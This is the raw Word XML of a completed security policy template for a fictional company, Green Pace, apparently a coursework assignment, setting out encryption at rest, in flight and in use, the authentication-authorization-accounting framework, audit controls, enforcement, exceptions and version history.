        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Include all three types of encryption (in flight, at rest, and in use) and each of the three elements of the Triple-A framework using the tables provided</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65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Explain each type of encryption, how it is used, and why and when the policy applies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65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Explain each type of Triple-A framework strategy, how it is used, and why and when the policy applies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240"/>
        <w:ind w:right="0" w:left="144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policies for each and explain what it is, how it should be applied in practice, and why it should be used.</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905"/>
        <w:gridCol w:w="8875"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="420" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1905"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bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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Encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8875"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Explain what it is and how and why the policy applies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="420" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1905"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Encryption at rest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8875"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stored data, including backups, must be encrypted using industry-standard encryption algorithms to protect against unauthorized access. Data on storage devices (e.g., databases, file systems, backups) must be encrypted at the hardware or software level. Access should be controlled with encryption keys securely managed and rotated regularly. Encrypting stored data protects it from unauthorized access, particularly if physical devices or storage systems are lost, stolen, or compromised. This is especially important for sensitive or regulated data like personal information and financial records.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="420" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1905"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Encryption in flight</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8875"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data transmitted over networks must be encrypted using secure protocols such as HTTPS, TLS, or equivalents. Encryption protocols must be implemented for communication between clients and servers, APIs, or internal systems. This ensures the confidentiality and integrity of sensitive data while in transit, preventing interception or tampering. Data in transit is vulnerable to interception (e.g., man-in-the-middle attacks). Encryption ensures that even if data is intercepted, it cannot be read or altered, protecting confidentiality and reducing the risk of data breaches.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="420" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1905"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Encryption in use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8875"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Sensitive data processed in memory must be encrypted or protected through secure computation methods, such as trusted execution environments (TEEs) or homomorphic encryption. Secure computation techniques should be used in sensitive operations like analytics, computation, or machine learning on encrypted datasets. TEEs or virtualized encryption may isolate data to ensure confidentiality during active processing. Data is at risk while being actively used in memory, as it can be accessed by malware or unauthorized processes. In-use encryption ensures sensitive data is protected during operations, minimizing the risk of compromise in highly sensitive applications like financial or healthcare systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="26"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr/>
      <w:tblGrid>
        <w:gridCol w:w="2074"/>
        <w:gridCol w:w="8706"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="420" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074"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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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Triple-A Framework*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8706"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Explain what it is and how and why the policy applies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="420" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074"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Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8706"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all users, devices, and systems are authenticated using strong methods like multi-factor authentication (MFA) or certificates. Implement secure authentication mechanisms for user logins, API calls, and system access. MFA adds a second layer of security, while certificates authenticate systems and devices communicating within the network. Authentication prevents unauthorized access by verifying the identity of users or systems. Strong authentication methods reduce the risk of compromised credentials and protect sensitive resources from unauthorized individuals or devices.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="420" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074"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Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8706"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role-based access control (RBAC) or attribute-based access control (ABAC) to enforce least privilege principles. Define and enforce access rules based on users' roles or attributes. Access policies should be reviewed regularly to ensure users or systems only have access to the resources necessary to perform their tasks. Authorization ensures users or systems can only perform actions or access resources they are explicitly allowed to, minimizing the risk of insider threats, privilege abuse, or accidental misuse.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="420" w:hRule="auto"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074"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Accounting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8706"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logging and monitoring systems to track user and system activity, and regularly review logs for anomalies or violations. Use centralized logging systems to record actions performed by users or systems. These logs should include timestamps, event details, and user identifiers and should be reviewed periodically or automatically analyzed for suspicious activities.</w:t>
              <w:tab/>
              <w:t xml:space="preserve"> Accounting provides an audit trail to track and analyze user and system behavior, ensuring accountability. This is crucial for detecting security incidents, identifying misconfigurations, and meeting compliance requirements for regulated industries.</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81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Use this checklist for the Triple A to be sure you include these elements in your policy:</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681"/>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User logins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="681"/>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Changes to the database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="681"/>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Addition of new users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="681"/>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User level of access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="681"/>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Files accessed by users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240"/>
        <w:ind w:right="0" w:left="720" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="000000"/>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Map the Principles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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81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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> Green Pace has already successfully implemented the following:</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688"/>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Operating system logs </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="688"/>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Firewall logs </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="688"/>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Anti-malware logs </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="688"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240"/>
        <w:ind w:right="0" w:left="1440" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:color w:val="000000"/>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only item you must complete beyond this point is the Policy Version History table.</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Audit Controls and Management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software development effort must be able to provide evidence of compliance for each software deployed into any Green Pace managed environment.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Evidence will include the following:</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69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Code compliance to standards</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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Well-documented access-control strategies, with sampled evidence of compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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Well-documented data-control standards defining the expected security posture of data at rest, in flight, and in use</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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Historical evidence of sustained practice (emails, logs, audits, meeting notes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240"/>
        <w:ind w:right="0" w:left="72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Enforcement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Staff members, consultants, or employees found in violation of this policy will be subject to disciplinary action, up to and including termination.</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Exceptions Process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Any exception to the standards in this policy must be requested in writing with the following information:</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69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Business or technical rationale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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Risk impact analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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Risk mitigation analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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Plan to come into compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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Date for when the plan to come into compliance will be completed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Approval for any exception must be granted by chief information officer (CIO) and the chief information security officer (CISO) or their appointed delegates of officer level.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Exceptions will remain on file with the office of the CISO, which will administer and govern compliance. </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Distribution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policy is to be distributed to all Green Pace IT staff annually. All IT staff will need to certify acceptance and awareness of this policy annually.</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Policy Change Control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policy will be automatically reviewed annually, no later than 365 days from the last revision date. Further, it will be reviewed in response to regulatory or compliance changes, and on demand as determined by the OCISO.</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Policy Version History</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345"/>
        <w:gridCol w:w="1530"/>
        <w:gridCol w:w="3510"/>
        <w:gridCol w:w="1923"/>
        <w:gridCol w:w="2077"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="836967" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="a5a5a5" w:sz="4"/>
              <w:right w:val="single" w:color="836967" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9"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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="836967" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="836967" w:sz="4"/>
              <w:right w:val="single" w:color="836967" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="836967" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="836967" w:sz="4"/>
              <w:right w:val="single" w:color="836967" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1923" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="836967" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="836967" w:sz="4"/>
              <w:right w:val="single" w:color="836967" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9"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Edited By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2077" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="836967" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="836967" w:sz="4"/>
              <w:right w:val="single" w:color="836967" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9"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Approved By</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1345"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53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08/05/2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="351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 Template</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1923"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David Buksbaum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2077"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45" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="a5a5a5" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="a5a5a5"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1530"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12/05/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3510"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Completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1923"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Colin Aheron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2077"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text.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1345"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text.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="153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text.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="351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text.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1923"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text.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2077"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text.]</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Appendix A Lookups</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Approved C/C++ Language Acronyms</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5192"/>
        <w:gridCol w:w="5193"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5192" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="836967" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="a5a5a5" w:sz="4"/>
              <w:right w:val="single" w:color="836967" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9"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Language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5193" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="836967" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="836967" w:sz="4"/>
              <w:right w:val="single" w:color="836967" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="d9d9d9"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Acronym</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5192"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5193"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CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5192" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="a5a5a5" w:sz="4"/>
              <w:left w:val="single" w:color="836967" w:sz="4"/>
              <w:bottom w:val="single" w:color="a5a5a5"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5193"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CLG</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1" w:hRule="atLeast"/>
          <w:jc w:val="left"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5192"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5193"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SEI CERT C++ Coding Standard - SEI CERT C++ Coding Standard - Confluence. (n.d.). Wiki.sei.cmu.edu. </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId7">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88046682</w:t>
        </w:r>
      </w:hyperlink>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18">
    <w:abstractNumId w:val="96"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="90"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="84"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="78"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="653">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="657">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="669">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="681">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="688">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="693">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="69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Mode="External" Target="https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88046682" Id="docRId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="embeddings/oleObject0.bin" Id="docRId0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship TargetMode="External" Target="https://www.linkedin.com/pulse/understanding-hierarchy-principles-policies-standards-wally-beddoe/" Id="docRId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="media/image1.wmf" Id="docRId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship Target="media/image2.wmf" Id="docRId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship Target="numbering.xml" Id="docRId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" /><Relationship Target="media/image0.wmf" Id="docRId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship Target="embeddings/oleObject2.bin" Id="docRId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship Target="styles.xml" Id="docRId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" /></Relationships>
</file>